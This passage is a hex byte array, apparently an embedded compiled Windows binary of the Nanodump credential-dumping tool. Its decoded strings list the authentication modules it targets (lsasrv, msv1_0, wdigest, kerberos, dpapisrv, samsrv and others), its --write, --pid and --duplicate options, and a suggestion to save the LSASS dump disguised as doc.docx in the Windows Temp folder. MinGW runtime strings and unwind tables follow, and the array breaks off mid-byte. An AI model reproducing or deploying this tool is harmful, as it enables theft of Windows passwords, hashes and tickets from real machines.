0x64,0x64,0x72,0x65,0x73,0x73,0x20,0x73,0x70,0x61,0x63,0x65,0x21,0x00,0x0A,0x00,0x00,0x00,0x54,0x68,0x65,0x20,0x64,0x75,0x6D,0x70,0x20,0x69,0x73,0x20,0x74,0x6F,0x6F,0x20,0x62,0x69,0x67,0x2C,0x20,0x70,0x6C,0x65,0x61,0x73,0x65,0x20,0x69,0x6E,0x63,0x72,0x65,0x61,0x73,0x65,0x20,0x44,0x55,0x4D,0x50,0x5F,0x4D,0x41,0x58,0x5F,0x53,0x49,0x5A,0x45,0x2E,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6D,0x00,0x73,0x00,0x76,0x00,0x31,0x00,0x5F,0x00,0x30,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x74,0x00,0x73,0x00,0x70,0x00,0x6B,0x00,0x67,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x77,0x00,0x64,0x00,0x69,0x00,0x67,0x00,0x65,0x00,0x73,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6B,0x00,0x65,0x00,0x72,0x00,0x62,0x00,0x65,0x00,0x72,0x00,0x6F,0x00,0x73,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6C,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x64,0x00,0x70,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6B,0x00,0x64,0x00,0x63,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x64,0x00,0x62,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x73,0x00,0x61,0x00,0x6D,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x72,0x00,0x73,0x00,0x61,0x00,0x65,0x00,0x6E,0x00,0x68,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6E,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6E,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x70,0x00,0x72,0x00,0x6F,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x65,0x00,0x76,0x00,0x65,0x00,0x6E,0x00,0x74,0x00,0x6C,0x00,0x6F,0x00,0x67,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x77,0x00,0x65,0x00,0x76,0x00,0x74,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x74,0x00,0x65,0x00,0x72,0x00,0x6D,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x63,0x00,0x6C,0x00,0x6F,0x00,0x75,0x00,0x64,0x00,0x61,0x00,0x70,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x4E,0x61,0x6E,0x6F,0x64,0x75,0x6D,0x70,0x20,0x64,0x6F,0x65,0x73,0x20,0x6E,0x6F,0x74,0x20,0x73,0x75,0x70,0x70,0x6F,0x72,0x74,0x20,0x57,0x6F,0x57,0x36,0x34,0x00,0x0A,0x00,0x53,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x2D,0x00,0x76,0x00,0x00,0x00,0x2D,0x00,0x2D,0x00,0x76,0x00,0x61,0x00,0x6C,0x00,0x69,0x00,0x64,0x00,0x00,0x00,0x2D,0x00,0x77,0x00,0x00,0x00,0x2D,0x00,0x2D,0x00,0x77,0x00,0x72,0x00,0x69,0x00,0x74,0x00,0x65,0x00,0x00,0x00,0x6D,0x69,0x73,0x73,0x69,0x6E,0x67,0x20,0x2D,0x2D,0x77,0x72,0x69,0x74,0x65,0x20,0x76,0x61,0x6C,0x75,0x65,0x00,0x2D,0x00,0x70,0x00,0x00,0x00,0x2D,0x00,0x2D,0x00,0x70,0x00,0x69,0x00,0x64,0x00,0x00,0x00,0x6D,0x69,0x73,0x73,0x69,0x6E,0x67,0x20,0x2D,0x2D,0x70,0x69,0x64,0x20,0x76,0x61,0x6C,0x75,0x65,0x00,0x2D,0x00,0x64,0x00,0x00,0x00,0x2D,0x00,0x2D,0x00,0x64,0x00,0x75,0x00,0x70,0x00,0x6C,0x00,0x69,0x00,0x63,0x00,0x61,0x00,0x74,0x00,0x65,0x00,0x00,0x00,0x69,0x6E,0x76,0x61,0x6C,0x69,0x64,0x20,0x61,0x72,0x67,0x75,0x6D,0x65,0x6E,0x74,0x3A,0x20,0x25,0x73,0x00,0x00,0x59,0x6F,0x75,0x20,0x6D,0x75,0x73,0x74,0x20,0x70,0x72,0x6F,0x76,0x69,0x64,0x65,0x20,0x74,0x68,0x65,0x20,0x64,0x75,0x6D,0x70,0x20,0x66,0x69,0x6C,0x65,0x3A,0x20,0x2D,0x2D,0x77,0x72,0x69,0x74,0x65,0x20,0x43,0x3A,0x5C,0x57,0x69,0x6E,0x64,0x6F,0x77,0x73,0x5C,0x54,0x65,0x6D,0x70,0x5C,0x64,0x6F,0x63,0x2E,0x64,0x6F,0x63,0x78,0x00,0x00,0x00,0x00,0x10,0xBB,0x48,0x65,0x00,0x80,0x49,0x65,0x04,0x80,0x49,0x65,0x38,0x4A,0x49,0x65,0x18,0x70,0x49,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4D,0x69,0x6E,0x67,0x77,0x2D,0x77,0x36,0x34,0x20,0x72,0x75,0x6E,0x74,0x69,0x6D,0x65,0x20,0x66,0x61,0x69,0x6C,0x75,0x72,0x65,0x3A,0x0A,0x00,0x41,0x64,0x64,0x72,0x65,0x73,0x73,0x20,0x25,0x70,0x20,0x68,0x61,0x73,0x20,0x6E,0x6F,0x20,0x69,0x6D,0x61,0x67,0x65,0x2D,0x73,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x20,0x20,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x51,0x75,0x65,0x72,0x79,0x20,0x66,0x61,0x69,0x6C,0x65,0x64,0x20,0x66,0x6F,0x72,0x20,0x25,0x64,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x61,0x74,0x20,0x61,0x64,0x64,0x72,0x65,0x73,0x73,0x20,0x25,0x70,0x00,0x00,0x00,0x00,0x20,0x20,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x50,0x72,0x6F,0x74,0x65,0x63,0x74,0x20,0x66,0x61,0x69,0x6C,0x65,0x64,0x20,0x77,0x69,0x74,0x68,0x20,0x63,0x6F,0x64,0x65,0x20,0x30,0x78,0x25,0x78,0x00,0x00,0x20,0x20,0x55,0x6E,0x6B,0x6E,0x6F,0x77,0x6E,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x70,0x72,0x6F,0x74,0x6F,0x63,0x6F,0x6C,0x20,0x76,0x65,0x72,0x73,0x69,0x6F,0x6E,0x20,0x25,0x64,0x2E,0x0A,0x00,0x00,0x00,0x20,0x20,0x55,0x6E,0x6B,0x6E,0x6F,0x77,0x6E,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x62,0x69,0x74,0x20,0x73,0x69,0x7A,0x65,0x20,0x25,0x64,0x2E,0x0A,0x00,0x00,0x00,0x25,0x64,0x20,0x62,0x69,0x74,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x61,0x74,0x20,0x25,0x70,0x20,0x6F,0x75,0x74,0x20,0x6F,0x66,0x20,0x72,0x61,0x6E,0x67,0x65,0x2C,0x20,0x74,0x61,0x72,0x67,0x65,0x74,0x69,0x6E,0x67,0x20,0x25,0x70,0x2C,0x20,0x79,0x69,0x65,0x6C,0x64,0x69,0x6E,0x67,0x20,0x74,0x68,0x65,0x20,0x76,0x61,0x6C,0x75,0x65,0x20,0x25,0x70,0x2E,0x0A,0x00,0x00,0x6D,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x72,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x5F,0x76,0x73,0x63,0x70,0x72,0x69,0x6E,0x74,0x66,0x00,0x00,0x00,0x00,0x6D,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x72,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x76,0x73,0x70,0x72,0x69,0x6E,0x74,0x66,0x5F,0x73,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x1C,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0xE0,0x0F,0xFF,0xFF,0x14,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x50,0xC5,0x0C,0x04,0x04,0x00,0x00,0x2C,0x00,0x00,0x00,0x3C,0x00,0x00,0x00,0xE0,0x0F,0xFF,0xFF,0xD1,0x01,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x46,0x87,0x03,0x86,0x04,0x83,0x05,0x02,0x6D,0x0A,0xC3,0x41,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x47,0x0B,0x00,0x30,0x00,0x00,0x00,0x6C,0x00,0x00,0x00,0x90,0x11,0xFF,0xFF,0xAE,0x01,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x41,0x87,0x03,0x43,0x86,0x04,0x43,0x83,0x05,0x02,0x78,0x0A,0xC3,0x41,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x4B,0x0B,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0xA0,0x00,0x00,0x00,0x0C,0x13,0xFF,0xFF,0x22,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x5C,0xC5,0x0C,0x04,0x04,0x00,0x00,0x1C,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x1C,0x13,0xFF,0xFF,0x1B,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x57,0xC5,0x0C,0x04,0x04,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x2C,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x04,0x13,0xFF,0xFF,0x9C,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x46,0x87,0x03,0x86,0x04,0x83,0x05,0x02,0x7D,0x0A,0xC3,0x41,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x47,0x0B,0x00,0x1C,0x00,0x00,0x00,0x4C,0x00,0x00,0x00,0x74,0x13,0xFF,0xFF,0x2F,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x6B,0xC5,0x0C,0x04,0x04,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x20,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x6C,0x13,0xFF,0xFF,0x4C,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x44,0x83,0x03,0x02,0x44,0xC5,0xC3,0x0C,0x04,0x04,0x00,0x20,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x94,0x13,0xFF,0xFF,0x38,0x02,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x44,0x83,0x03,0x03,0x30,0x02,0xC5,0xC3,0x0C,0x04,0x04,0x1C,0x00,0x00,0x00,0x64,0x00,0x00,0x00,0xA8,0x15,0xFF,0xFF,0x43,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x7F,0xC5,0x0C,0x04,0x04,0x00,0x00,0x1C,0x00,0x00,0x00,0x84,0x00,0x00,0x00,0xCB,0x15,0xFF,0xFF,0x60,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x02,0x5C,0xC5,0x0C,0x04,0x04,0x00,0x1C,0x00,0x00,0x00,0xA4,0x00,0x00,0x00,0x0B,0x16,0xFF,0xFF,0xFC,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x02,0xF8,0xC5,0x0C,0x04,0x04,0x00,0x1C,0x00,0x00,0x00,0xC4,0x00,0x00,0x00,0xE7,0x16,0xFF,0xFF,0xB0,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x02,0xAC,0xC5,0x0C,0x04,0x04,0x00,0x1C,0x00,0x00,0x00,0xE4,0x00,0x00,0x00,0x77,0x17,0xFF,0xFF,0xE4,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x02,0xE0,0xC5,0x0C,0x04,0x04,0x00,0x20,0x00,0x00,0x00,0x04,0x01,0x00,0x00,0x3B,0x18,0xFF,0xFF,0x62,0x02,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x44,0x83,0x03,0x03,0x5A,0x02,0xC5,0xC3,0x0C,0x04,0x04,0x1C,0x00,0x00,0x00,0x28,0x01,0x00,0x00,0x79,0x1A,0xFF,0xFF,0x17,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x53,0xC5,0x0C,0x04,0x04,0x00,0x00,0x1C,0x00,0x00,0x00,0x48,0x01,0x00,0x00,0x70,0x1A,0xFF,0xFF,0x94,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x02,0x90,0xC5,0x0C,0x04,0x04,0x00,0x1C,0x00,0x00,0x00,0x68,0x01,0x00,0x00,0xE4,0x1A,0xFF,0xFF,0x22,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x5E,0xC5,0x0C,0x04,0x04,0x00,0x00,0x1C,0x00,0x00,0x00,0x88,0x01,0x00,0x00,0xE6,0x1A,0xFF,0xFF,0xD3,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x02,0xCF,0xC5,0x0C,0x04,0x04,0x00,0x10,0x00,0x00,0x00,0xA8,0x01,0x00,0x00,0x99,0x1B,0xFF,0xFF,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0xBC,0x01,0x00,0x00,0x8C,0x1B,0xFF,0xFF,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0xD0,0x01,0x00,0x00,0x80,0x1B,0xFF,0xFF,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2C,0x00,0x00,0x00,0xE4,0x01,0x00,0x00,0x78,0x1B,0xFF,0xFF,0x4C,0x05,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x49,0x87,0x03,0x86,0x04,0x83,0x05,0x03,0x3C,0x05,0xC3,0x41,0xC6,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x14,0x02,0x00,0x00,0x94,0x20,0xFF,0xFF,0xA3,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x00,0x00,0x28,0x02,0x00,0x00,0x23,0x21,0xFF,0xFF,0x9B,0x02,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x45,0x87,0x03,0x83,0x04,0x03,0x90,0x02,0xC3,0x41,0xC7,0x41,0xC5,0x0C,0x04,0x04,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x54,0x02,0x00,0x00,0x92,0x23,0xFF,0xFF,0x28,0x02,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x03,0x24,0x02,0xC5,0x0C,0x04,0x04,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x20,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x84,0x25,0xFF,0xFF,0x47,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x44,0x83,0x03,0x7F,0xC5,0xC3,0x0C,0x04,0x04,0x00,0x00,0x1C,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0xA7,0x25,0xFF,0xFF,0xA3,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x02,0x9F,0xC5,0x0C,0x04,0x04,0x00,0x1C,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x2A,0x26,0xFF,0xFF,0xBE,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x02,0xBA,0xC5,0x0C,0x04,0x04,0x00,0x10,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0xC8,0x26,0xFF,0xFF,0x5A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x94,0x00,0x00,0x00,0x0E,0x27,0xFF,0xFF,0x39,0x01,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x47,0x87,0x03,0x03,0x2E,0x01,0xC5,0xC7,0x0C,0x04,0x04,0x20,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x23,0x28,0xFF,0xFF,0x08,0x01,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x47,0x87,0x03,0x02,0xFD,0xC5,0xC7,0x0C,0x04,0x04,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x1C,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0xF0,0x28,0xFF,0xFF,0x3D,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x79,0xC5,0x0C,0x04,0x04,0x00,0x00,0x1C,0x00,0x00,0x00,0x3C,0x00,0x00,0x00,0x0D,0x29,0xFF,0xFF,0x4A,0x01,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x03,0x46,0x01,0xC5,0x0C,0x04,0x04,0x1C,0x00,0x00,0x00,0x5C,0x00,0x00,0x00,0x37,0x2A,0xFF,0xFF,0xEF,0x00,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x02,0xEB,0xC5,0x0C,0x04,0x04,0x00,0x1C,0x00,0x00,0x00,0x7C,0x00,0x00,0x00,0x06,0x2B,0xFF,0xFF,0x83,0x01,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x03,0x7F,0x01,0xC5,0x0C,0x04,0x04,0x20,0x00,0x00,0x00,0x9C,0x00,0x00,0x00,0x69,0x2C,0xFF,0xFF,0xFF,0x01,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x47,0x87,0x03,0x03,0xF4,0x01,0xC5,0xC7,0x0C,0x04,0x04,0x1C,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x44,0x2E,0xFF,0xFF,0x00,0x01,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x02,0xFC,0xC5,0x0C,0x04,0x04,0x00,0x20,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0x24,0x2F,0xFF,0xFF,0xBD,0x05,0x00,0x00,0x00,0x41,0x0E,0x08,0x85,0x02,0x42,0x0D,0x05,0x4